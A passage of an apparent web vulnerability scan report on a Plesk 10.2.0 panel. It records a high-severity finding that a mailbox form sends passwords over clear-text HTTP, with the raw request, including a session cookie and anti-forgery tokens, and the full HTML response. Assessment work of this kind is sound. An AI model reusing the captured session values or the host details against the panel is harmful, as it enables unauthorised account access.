addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:52:19 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:52:19 GMT
Connection: close
Content-Length: 38577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>format-2@vulnerable.host.fqdn - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F4' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-2@vulnerable.host.fqdn</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="format-2" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/mail-list/create/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/mail-list/create/

Issue detail

